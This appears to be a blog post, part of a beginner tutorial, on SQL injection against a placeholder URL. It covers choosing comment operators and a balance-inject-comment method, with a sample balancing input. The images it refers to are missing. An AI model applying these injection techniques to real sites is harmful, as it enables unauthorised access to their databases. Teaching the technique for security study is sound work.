Balance SQLi Query Techniques
WELCOME TO THE THIRD PART OF THE BASICS OF SQL FOR SQL INJECTION. AS IN THE LAST PART WE TOOK THIS URL "HTTP://FAKESITE.COM/REPORT.PHP?ID=23" AS AN EXAMPLE AND THEN ASSUMED SOME BASIC QUERIES BY LOOKING AT THE URL AND THEN WE TRIED DIFFERENT INJECTIONS AND LEARNT HOW TO FIGURE OUT WHICH TYPE OF QUERY WE ARE FACING. IN THIS TUTORIAL WE WILL LEARN HOW WE CAN UNDERSTAND WHICH COMMENT TYPE WE SHOULD USE AND WHY AND HOW TO FIND THE NUMBER OF COLUMNS AS DISCUSSED EARLIER FOLLOWING ARE THE DIFFERENT TYPES OF COMMENTS
USED IN SQLI.
well, actually it only depends on the environment and reaction of the application when we try some commenting operators. If you see PHP is used then usually "--" will surely work otherwise you can check "--+" or "# (URL encoded)", else the best option is to try with different types of comments and analyses the input. So what we will do to check is try to close our input with all possibilities like single quote double-quote or brackets etc. and comment rest query and if it works then we can be sure that this comment is working. We will again take the same URL for example
"http://fakesite.com/report.php?id=23"
so let’s see how can we check for which
comment to use.
so as I showed above test for '--' type comment in the same manner you can check for all commenting types and the one which gives the same output as giving with
"http://fakesite.com/report.php?id=23"
then that can help you understand the type of internal query along with the comment that you can use. Now as we have understood understanding and knowing the internal query and then finding the type of command we can use. First of all, we will understand the basics of injecting.
Any time anywhere or any application where ever and whenever you are injecting
there are following three basic rules of injecting
[1]. Balance.
[2]. Inject.
[3]. Commenting.
Understanding the first phase "Balance":
In this phase we balance the internal query, for example, lets say after reading the Part
1 and Part 2 we understand that how can we assume and figure out the internal query
used by the application where your input is injected. Let's say we figured out that out
the internal query is "Select * from tablename where id=('23')" so in this case our balance
input should be 23').
The phase of Injection:
In this phase, we inject as per our requirement, and the type of injection we are doing.
The phase of Commenting:
Then the last part of commenting, which we already know. Now check the below image
which will show you all the three parts of injection.
As per the Above Injection, we can assume the internal query to be:
So now let’s start with our next phase, Using this query "--+" the error of the SQL is fixed so queries are balanced successfully.
No comments:
Post a Comment